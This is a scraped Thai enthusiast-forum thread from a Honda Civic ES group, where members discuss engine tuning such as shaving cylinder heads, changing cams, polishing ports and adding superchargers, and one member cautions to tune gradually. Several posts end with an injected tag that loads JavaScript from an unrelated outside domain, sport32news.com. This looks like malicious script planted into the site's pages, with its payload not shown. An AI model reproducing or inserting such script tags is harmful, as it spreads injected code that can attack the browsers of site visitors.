ตอบ
marcuz


ชื่อเล่น: เพชร

เข้าร่วม: 08 ตุลา 2008
ตอบ: 576

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 810
ให้คำขอบคุณ: 325

ปี: 2002
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 16 พฤศจิกา 2009 22:27 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
อยากทราบว่าทำไมไม่มีคนพูดถึงเรื่องการแต่งพวกนี้เลยครับ ไอ้การปาดฝา เปลี่ยนแคม ขัดพอร์ทเนี่ย

มันช่วยให้แรงขึ้นเยอะมั้ย แล้วมีใครทำมั้งครับ
es_mania


ชื่อเล่น: แมน

เข้าร่วม: 02 ตุลา 2008
ตอบ: 1208

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2641
ให้คำขอบคุณ: 1357

ที่อยู่: สุขุมวิท 101 - ม.สวนดุสิต
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 16 พฤศจิกา 2009 22:41 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
อยากทราบเหมือนกานว่า สำนักต่างๆทำแคมซิ่งตัวเครื่องเราออกมาป่าว
kittidech


ชื่อเล่น: กิต คร้าบ

เข้าร่วม: 06 กรกฎา 2009
ตอบ: 2334

Moderator
Moderator

ได้รับคำขอบคุณ: 2835
ให้คำขอบคุณ: 15110

ที่อยู่: อ.บ้านบึง จ.ชลบุรี
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 16 พฤศจิกา 2009 22:46 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
อยากรู้เหมือนกานครับ น่าสนใจ "<script src="https://sport32news.com/civicesgroup.js">
xcyber


ชื่อเล่น: เอ็กซ์

เข้าร่วม: 30 ตุลา 2008
ตอบ: 1105

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1281
ให้คำขอบคุณ: 217

ที่อยู่: เจริญนคร
ปี: 2001
จันทร์, 16 พฤศจิกา 2009 23:06 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
จะแรงกันไปถึงไหนครับ รอๆ กันบ้างจิ
Ti_es03


เข้าร่วม: 01 ตุลา 2008
ตอบ: 408

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 590
ให้คำขอบคุณ: 440

ที่อยู่: Rangsit
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
จันทร์, 16 พฤศจิกา 2009 23:07 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
cam แต่งมีขายแต่จะเป็นของทางฝั่งอเมริกา
ได้รับคำขอบคุณจาก: karma  kittidech  ~ สเตฟาน ~ 
Lee_ES_turbo


เข้าร่วม: 02 ตุลา 2008
ตอบ: 4446

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 8088
ให้คำขอบคุณ: 5249

ปี: 2004
จันทร์, 16 พฤศจิกา 2009 23:07 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
marcuz พิมพ์ว่า:
อยากทราบว่าทำไมไม่มีคนพูดถึงเรื่องการแต่งพวกนี้เลยครับ ไอ้การปาดฝา เปลี่ยนแคม ขัดพอร์ทเนี่ย

มันช่วยให้แรงขึ้นเยอะมั้ย แล้วมีใครทำมั้งครับ



es_mania พิมพ์ว่า:
อยากทราบเหมือนกานว่า สำนักต่างๆทำแคมซิ่งตัวเครื่องเราออกมาป่าว



การปาดฝา คือการทำให้กำลังอัดในห้องเผาไหม้มากขึ้น อธิบายง่ายๆนะคับ เครื่องยนต์เดิมๆออกจากโรงงานทุกคัน ออกแบบมาให้ใช้ในชีวิตประจำวัน ขับง่าย ดูแลง่าย ทนทาน จะมีกำลังอัดที่ไม่มาก ประมาน 8.5-9.5 โดยประมาน เพื่อให้เครื่องยนต์ทำงานได้ทุกวัน ภาระของเครื่องน้อย กำลังพอดี ไม่มากหรือน้อยตาม CC ของรถ เครื่องเดิมๆจะมีช่องว่างระหว่างลูกสูบกับฝาสูบนิดหน่อย ลูกจะไม่ขึ้นมาติดวาร์วด้านบน พอปาดฝาสูบ เป็นการลดช่องว่างระหว่างลูกสูบกับวาร์วด้านบน พอช่องว่างลดน้อยลง จะทำให้อากาศที่ไหลเข้ามาในปริมาณเท่าเดิมเนี่ย มีพื้นที่น้อยลงกว่าก่อนปาดฝา (ลองนึกดู ว่าเอาน้ำ 10cc ใส่ในขวดพลาสติก 10cc มานจะพอดี แต่ถ้าเอาน้ำ 10cc มาใส่ในขวดพลาสติก 9cc ขวดก่อจะบวม) ทำให้อากาศถูกอัดแน่นกว่าเก่า และจะได้แรงระเบิดที่รุนแรกกว่าก่อนปาดฝา ได้กำลังมากขึ้น เครื่องก่อจะแรงขึ้นตามกำลังอัดที่เพื่มขึ้น

เปลี่ยนแคม ก่อคือแคมที่องศาสูงกว่า จะมีลูกเบี้ยวที่โตกว่า จะกดวาร์วลึกกว่า นานกว่านิดหน่อย อากาศก่อจะเข้าเยอะกว่า พออากาศเข้าเยอะ กำลังอัดก่อเพื่อขึ้น แรงขึ้นแน่นอน

ขัดพอร์ต เพื่อให้ข้างในรูพอร์ตเรียบ อากาศจะสามารถผ่านไปได้อย่างรวดเร็ว ไม่ติดขัด ถ้าเปิดพอร์ตด้วย จะได้พอร์ตที่ใหญ่ขึ้น อากาศนอกจากจะไหลเร็วแล้ว ยังเยอะด้วย ถ้าเจียร์บ่า เจียร์วาร์วด้วย ก่อยิ่งได้ประสิทธิภาพของมานมากขึ้นเท่านั้นแรงกว่าเดิมเห็นๆ

เรื่องแคมสำหรับตัว D17 มีคับ จากทางฝั่งอเมริกา เรื่องยี่ห้อกับราคาไม่แน่ใจ ลองถาม CM ดูนะคับ เมื่อก่อนเคยได้ยินว่า ที่นี่สั่งให้ได้คับ ก่อประมานนี้นะคับ ถ้าอ่านแล้วงง ขออภัยด้วยนะคับ สมองเบรอๆคับ
marcuz


ชื่อเล่น: เพชร

เข้าร่วม: 08 ตุลา 2008
ตอบ: 576

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 810
ให้คำขอบคุณ: 325

ปี: 2002
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 16 พฤศจิกา 2009 23:29 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
ขอบคุณมากกคร้าบ สำหรับความรู้

ที่ถามเพราะไม่เคยเห็นใครทำเลย

เออแล้วอีกเรื่องครับ เรื่องบล็อคการ์ดคือเค้าใส่ไว้กันฝาแตกใช่มั้ยครับ ทำให้ใช้รอบได้สูงขึ้นรึเปล่า
ได้รับคำขอบคุณจาก: karma  tokykung 
karma


ชื่อเล่น: เต๋า

เข้าร่วม: 23 มีนา 2009
ตอบ: 718

Guru ES
Guru ES

ได้รับคำขอบคุณ: 954
ให้คำขอบคุณ: 722

ที่อยู่: พระราม 2
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 16 พฤศจิกา 2009 23:57 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
สุดยอดมากเลยครับ อยากรู้เหมือนกันเลยครับ ว่าแต่มีร้านขัดดีดีบ้างหรือเปล่าครับ
dogtown


ชื่อเล่น: อัดขัดลำ

เข้าร่วม: 01 ธันวา 2008
ตอบ: 1114

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2018
ให้คำขอบคุณ: 416

ที่อยู่: บางปะกอก ฝั่งธน
ปี: 2001
อังคาร, 17 พฤศจิกา 2009 01:09 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
คนทำหนะมีครับ เห็นมีอยู่หลายคนนะครับ แต่ไม่เปิดเผยกันเท่าไหล่ ^^

เรื่องแคมรอพี่คนคนนึงดีกว่าเค้าเคยใส่อยู่เดี๋ยวจะบอกเค้าให้คร้าบบบบ

ปล.มีตังแล้วถ้ารถซ๋อมเสร็จอยากจะทำบ้างเหมือนกันครับ
ได้รับคำขอบคุณจาก: tokykung  tueypp 
marcuz


ชื่อเล่น: เพชร

เข้าร่วม: 08 ตุลา 2008
ตอบ: 576

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 810
ให้คำขอบคุณ: 325

ปี: 2002
สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 17 พฤศจิกา 2009 01:38 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
แล้วมีใครพอแนะนำได้บ้างมั้ยครับว่าร้านไหนปาดฝา ขัดพอร์ทดีๆมั่งครับ
Lee_ES_turbo


เข้าร่วม: 02 ตุลา 2008
ตอบ: 4446

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 8088
ให้คำขอบคุณ: 5249

ปี: 2004
อังคาร, 17 พฤศจิกา 2009 08:43 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
marcuz พิมพ์ว่า:
แล้วมีใครพอแนะนำได้บ้างมั้ยครับว่าร้านไหนปาดฝา ขัดพอร์ทดีๆมั่งครับ



เพื่อนผมทำได้คับ งานฝีมือคับ ทำมาหลายคันแล้วคับ
ได้รับคำขอบคุณจาก: tueypp 
GuideZ


เข้าร่วม: 01 ตุลา 2008
ตอบ: 837

Guru ES
Guru ES

ได้รับคำขอบคุณ: 776
ให้คำขอบคุณ: 136

ที่อยู่: THE GANG ไก่จ๊าก ระยองฮิ
อังคาร, 17 พฤศจิกา 2009 09:54 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
dogtown พิมพ์ว่า:
คนทำหนะมีครับ เห็นมีอยู่หลายคนนะครับ แต่ไม่เปิดเผยกันเท่าไหล่ ^^

เรื่องแคมรอพี่คนคนนึงดีกว่าเค้าเคยใส่อยู่เดี๋ยวจะบอกเค้าให้คร้าบบบบ

ปล.มีตังแล้วถ้ารถซ๋อมเสร็จอยากจะทำบ้างเหมือนกันครับ





จัดเลยพี่ชายยย
ได้รับคำขอบคุณจาก: tokykung 
note^-^


ชื่อเล่น: โน๊ต

เข้าร่วม: 23 ตุลา 2008
ตอบ: 1188

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1988
ให้คำขอบคุณ: 501

ที่อยู่: สมุทรสาคร-นครชัยศรี
ปี: 2003
อังคาร, 17 พฤศจิกา 2009 09:58 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
Lee_ES_turbo พิมพ์ว่า:
marcuz พิมพ์ว่า:
อยากทราบว่าทำไมไม่มีคนพูดถึงเรื่องการแต่งพวกนี้เลยครับ ไอ้การปาดฝา เปลี่ยนแคม ขัดพอร์ทเนี่ย

มันช่วยให้แรงขึ้นเยอะมั้ย แล้วมีใครทำมั้งครับ



es_mania พิมพ์ว่า:
อยากทราบเหมือนกานว่า สำนักต่างๆทำแคมซิ่งตัวเครื่องเราออกมาป่าว



การปาดฝา คือการทำให้กำลังอัดในห้องเผาไหม้มากขึ้น อธิบายง่ายๆนะคับ เครื่องยนต์เดิมๆออกจากโรงงานทุกคัน ออกแบบมาให้ใช้ในชีวิตประจำวัน ขับง่าย ดูแลง่าย ทนทาน จะมีกำลังอัดที่ไม่มาก ประมาน 8.5-9.5 โดยประมาน เพื่อให้เครื่องยนต์ทำงานได้ทุกวัน ภาระของเครื่องน้อย กำลังพอดี ไม่มากหรือน้อยตาม CC ของรถ เครื่องเดิมๆจะมีช่องว่างระหว่างลูกสูบกับฝาสูบนิดหน่อย ลูกจะไม่ขึ้นมาติดวาร์วด้านบน พอปาดฝาสูบ เป็นการลดช่องว่างระหว่างลูกสูบกับวาร์วด้านบน พอช่องว่างลดน้อยลง จะทำให้อากาศที่ไหลเข้ามาในปริมาณเท่าเดิมเนี่ย มีพื้นที่น้อยลงกว่าก่อนปาดฝา (ลองนึกดู ว่าเอาน้ำ 10cc ใส่ในขวดพลาสติก 10cc มานจะพอดี แต่ถ้าเอาน้ำ 10cc มาใส่ในขวดพลาสติก 9cc ขวดก่อจะบวม) ทำให้อากาศถูกอัดแน่นกว่าเก่า และจะได้แรงระเบิดที่รุนแรกกว่าก่อนปาดฝา ได้กำลังมากขึ้น เครื่องก่อจะแรงขึ้นตามกำลังอัดที่เพื่มขึ้น

เปลี่ยนแคม ก่อคือแคมที่องศาสูงกว่า จะมีลูกเบี้ยวที่โตกว่า จะกดวาร์วลึกกว่า นานกว่านิดหน่อย อากาศก่อจะเข้าเยอะกว่า พออากาศเข้าเยอะ กำลังอัดก่อเพื่อขึ้น แรงขึ้นแน่นอน

ขัดพอร์ต เพื่อให้ข้างในรูพอร์ตเรียบ อากาศจะสามารถผ่านไปได้อย่างรวดเร็ว ไม่ติดขัด ถ้าเปิดพอร์ตด้วย จะได้พอร์ตที่ใหญ่ขึ้น อากาศนอกจากจะไหลเร็วแล้ว ยังเยอะด้วย ถ้าเจียร์บ่า เจียร์วาร์วด้วย ก่อยิ่งได้ประสิทธิภาพของมานมากขึ้นเท่านั้นแรงกว่าเดิมเห็นๆ

เรื่องแคมสำหรับตัว D17 มีคับ จากทางฝั่งอเมริกา เรื่องยี่ห้อกับราคาไม่แน่ใจ ลองถาม CM ดูนะคับ เมื่อก่อนเคยได้ยินว่า ที่นี่สั่งให้ได้คับ ก่อประมานนี้นะคับ ถ้าอ่านแล้วงง ขออภัยด้วยนะคับ สมองเบรอๆคับ



ขอบคุณครับ
ได้รับคำขอบคุณจาก: tokykung 
mong_civic


ชื่อเล่น: หม่อง

เข้าร่วม: 11 มิถุนา 2009
ตอบ: 709

Guru ES
Guru ES

ได้รับคำขอบคุณ: 672
ให้คำขอบคุณ: 377

ที่อยู่: Chonburi
ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 17 พฤศจิกา 2009 10:12 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
เคยอ่านเจอว่าพอร์ตไอเสียให้ขัดให้ลื่นที่สุด
แต่พอร์ตไอดีไม่ต้องลื่นมาก ก็ไม่รู้ว่าจริงเท็จประการใดครับ
ได้รับคำขอบคุณจาก: tokykung 
Alert


ชื่อเล่น: เลิ๊ด

เข้าร่วม: 20 สิงหา 2008
ตอบ: 618

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1516
ให้คำขอบคุณ: 70

ที่อยู่: ladphao
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 17 พฤศจิกา 2009 11:52 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
ทุกอย่างมีสูตรและลิมิตของมันอยู่นะครับ

ไม่ใช่ขัด ปาด พอก แยง เจียร กันตามความรู้สึก

ไม่งั๊นอาจมีการไส้แตก ก้านขาด ลูกโหม่ง ฯลฯ

ของเดิมโรงงานเค๊าเซ็ทมาให้ ประหยัด ทนทาน ใช้งานง่ายในชีวิตประจำวัน

ทางที่ดีควรเริ่มต้นจาก light tune ก่อนแล้วค่อยขยับสเต็ปครับ
ได้รับคำขอบคุณจาก: PAE KUNG  Lee_ES_turbo  tokykung  kittidech  Blackhole 
dogtown


ชื่อเล่น: อัดขัดลำ

เข้าร่วม: 01 ธันวา 2008
ตอบ: 1114

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2018
ให้คำขอบคุณ: 416

ที่อยู่: บางปะกอก ฝั่งธน
ปี: 2001
อังคาร, 17 พฤศจิกา 2009 12:20 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
GuideZ พิมพ์ว่า:
dogtown พิมพ์ว่า:
คนทำหนะมีครับ เห็นมีอยู่หลายคนนะครับ แต่ไม่เปิดเผยกันเท่าไหล่ ^^

เรื่องแคมรอพี่คนคนนึงดีกว่าเค้าเคยใส่อยู่เดี๋ยวจะบอกเค้าให้คร้าบบบบ

ปล.มีตังแล้วถ้ารถซ๋อมเสร็จอยากจะทำบ้างเหมือนกันครับ





จัดเลยพี่ชายยย


เอาก่อนเลยครับน้องชายยยยย รถพี่อีกนานนนนนโขกว่าจะเสร็จ อิอิ
ได้รับคำขอบคุณจาก: tokykung 
PAE KUNG


ชื่อเล่น: เป้

เข้าร่วม: 08 ตุลา 2008
ตอบ: 1131

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2818
ให้คำขอบคุณ: 3696

ที่อยู่: Bangna&Bangbon
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 17 พฤศจิกา 2009 12:33 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
Alert พิมพ์ว่า:
ทุกอย่างมีสูตรและลิมิตของมันอยู่นะครับ

ไม่ใช่ขัด ปาด พอก แยง เจียร กันตามความรู้สึก

ไม่งั๊นอาจมีการไส้แตก ก้านขาด ลูกโหม่ง ฯลฯ

ของเดิมโรงงานเค๊าเซ็ทมาให้ ประหยัด ทนทาน ใช้งานง่ายในชีวิตประจำวัน

ทางที่ดีควรเริ่มต้นจาก light tune ก่อนแล้วค่อยขยับสเต็ปครับ


เห็นด้วยครับผม
ได้รับคำขอบคุณจาก: tokykung 
InDePenDent


ชื่อเล่น: ยู

เข้าร่วม: 20 สิงหา 2009
ตอบ: 901

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1603
ให้คำขอบคุณ: 2016

ที่อยู่: Bangkok (RamaII) , Chonburi (Laem Chabang)
ปี: 2001
อังคาร, 17 พฤศจิกา 2009 12:34 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
มาแอบเก็บข้อมูล
ได้รับคำขอบคุณจาก: tokykung 
BOY es


ชื่อเล่น: บอยคับ

เข้าร่วม: 27 สิงหา 2009
ตอบ: 708

Guru ES
Guru ES

ได้รับคำขอบคุณ: 362
ให้คำขอบคุณ: 0

ที่อยู่: ลพบุรี
ปี: 2001
สี: ม่วง วินเทจพลัม (RP-32P)
อังคาร, 17 พฤศจิกา 2009 12:54 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
เก็บข้อมูลคับ "<script src="https://sport32news.com/civicesgroup.js">
Hamster@Yamabuchi


ชื่อเล่น: เบิร์ด

เข้าร่วม: 27 มีนา 2009
ตอบ: 2005

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5433
ให้คำขอบคุณ: 3267

ที่อยู่: เขตหวงห้ามเฉพาะ
ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 17 พฤศจิกา 2009 13:12 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
อิอิอิ มีคนรู้จักทำสเต็บนี้ครบทุกสูตรเลยครับ ของส่วนมากมาจากเมกา อยู่ระหว่างการดำเนินการ ถ้าเสร็จแล้วรอเจ้าของรถเค้าออกมาบอกเองดีฟ่า ยังไงเอาใจช่วยให้เสร็จไวๆครับ อิอิอิ....................ผมเห็นแค่ท่อไอดีแล้ว แทบซ๊อค อิอิอิอิ ....................D17 นี่เป็นเครื่องที่ไม่ธรรมดาจิงๆ ครับ......
ได้รับคำขอบคุณจาก: Lee_ES_turbo  tokykung  tueypp  kittidech 
marcuz


ชื่อเล่น: เพชร

เข้าร่วม: 08 ตุลา 2008
ตอบ: 576

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 810
ให้คำขอบคุณ: 325

ปี: 2002
สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 17 พฤศจิกา 2009 14:22 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
ใครหรอพี่หมวดดด เพชรอยากทำม้างง
thanettrakool


ชื่อเล่น: ตั๊น

เข้าร่วม: 03 พฤศจิกา 2008
ตอบ: 972

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1301
ให้คำขอบคุณ: 1481

ที่อยู่: แถวๆพระประแดง
ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 17 พฤศจิกา 2009 15:38 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
Alert พิมพ์ว่า:
ทุกอย่างมีสูตรและลิมิตของมันอยู่นะครับ

ไม่ใช่ขัด ปาด พอก แยง เจียร กันตามความรู้สึก

ไม่งั๊นอาจมีการไส้แตก ก้านขาด ลูกโหม่ง ฯลฯ

ของเดิมโรงงานเค๊าเซ็ทมาให้ ประหยัด ทนทาน ใช้งานง่ายในชีวิตประจำวัน

ทางที่ดีควรเริ่มต้นจาก light tune ก่อนแล้วค่อยขยับสเต็ปครับ


ปล่อยมันไปพี่.........เด็กมันยังเปรี้ยว 5 5 5 5 5 5 <script src="https://sport32news.com/civicesgroup.js"></
benzd


ชื่อเล่น: เบนซ์

เข้าร่วม: 11 มกรา 2009
ตอบ: 3402

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3986
ให้คำขอบคุณ: 3164

ที่อยู่: เกตุม-มหาชัย-สมุทรสาคร
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 7 มกรา 2011 10:44 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
coromant


เข้าร่วม: 09 ตุลา 2008
ตอบ: 5132

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6854
ให้คำขอบคุณ: 719
ศุกร์, 7 มกรา 2011 11:39 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
เจ้าของกระทู้หนีไปลง F20B นั่งมาแล้วอย่างแรงเลย อิอิ
PAE KUNG


ชื่อเล่น: เป้

เข้าร่วม: 08 ตุลา 2008
ตอบ: 1131

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2818
ให้คำขอบคุณ: 3696

ที่อยู่: Bangna&Bangbon
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 7 มกรา 2011 11:42 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
coromant พิมพ์ว่า:
เจ้าของกระทู้หนีไปลง F20B นั่งมาแล้วอย่างแรงเลย อิอิ



เดี๊ยววันนี้เย็นๆ จะเข้าไปลองซะหน่อย อยากรู้เหลือเกินว่ามันจะแค่ไหนเชียว
coromant


เข้าร่วม: 09 ตุลา 2008
ตอบ: 5132

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6854
ให้คำขอบคุณ: 719
ศุกร์, 7 มกรา 2011 11:46 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
PAE KUNG พิมพ์ว่า:
coromant พิมพ์ว่า:
เจ้าของกระทู้หนีไปลง F20B นั่งมาแล้วอย่างแรงเลย อิอิ



เดี๊ยววันนี้เย็นๆ จะเข้าไปลองซะหน่อย อยากรู้เหลือเกินว่ามันจะแค่ไหนเชียว


ลองได้หรอ เมื่อวานยังเห็นขึ้นขาหยั่งอยู่เลย คุณเป้
PAE KUNG


ชื่อเล่น: เป้

เข้าร่วม: 08 ตุลา 2008
ตอบ: 1131

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2818
ให้คำขอบคุณ: 3696

ที่อยู่: Bangna&Bangbon
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 7 มกรา 2011 11:52 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
เห็นบอกวันนี้เย็นลองได้ครับคุณหนุ่ม เจ้าของรถสั่งแล้วครับ
maxch


เข้าร่วม: 13 สิงหา 2009
ตอบ: 2190

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1513
ให้คำขอบคุณ: 2530

ที่อยู่: อยุธยา-สระบุรี
ปี: 2003
ศุกร์, 7 มกรา 2011 12:01 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
ข้อมูลดีๆเพียบเก็บก่อน <script src="https://sport32news.com/civicesgroup.js"></
lkki5


เข้าร่วม: 26 ตุลา 2008
ตอบ: 2973

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3115
ให้คำขอบคุณ: 1255

ที่อยู่: สัตหีบ ชลบุรี หรือ พิจิตร นครสวรรค์
ปี: 2001
สี: น้ำเงิน อิเทอนอล (B-96P)
ศุกร์, 7 มกรา 2011 14:44 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
กะว่าจะลองติดซูเปอร์ชาร์จดู มีใครจะลองกับผมไหม
ปล.ตอนนี้เอาคอท่อไอดี y8 ไปทำที่ร้านพี่พลอยู่


แก้ไขล่าสุดโดย เมื่อ ศุกร์, 7 มกรา 2011 19:40, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
sevenartz


ชื่อเล่น: อาร์ท

เข้าร่วม: 17 มีนา 2010
ตอบ: 1321

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2847
ให้คำขอบคุณ: 20

ที่อยู่: Hell
ปี: 2001
สี: น้ำเงิน วิวิด (มุก) (B-502P)
ศุกร์, 7 มกรา 2011 18:01 - อยากทราบการแต่งเครื่องแบบ ปาดฝา เปลี่ยนแคม ขัดพอร์ท
lkki5 พิมพ์ว่า:
กะว่าจะลองติดซูเปอร์ชาร์จดู มีใครจะลองกับผมไหม



ได้อ่านหนังสือ ออพชั่น ฉบับ เจแปนแปลไทยน่ะครัฟ

เค้าก็ว่าราคาติดซูเปอร์ชาร์จ เทียบกันแล้วถูก กว่าเทอร์โบ และไม่ยุ่งยากเท่าไหร่

มันก็น่่าสนดีนะผมว่า อยากลองเหมือนกันครัฟ แต่ต้องหาอู่ที่เนียนๆ จูนเก่งๆ หน่อย
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.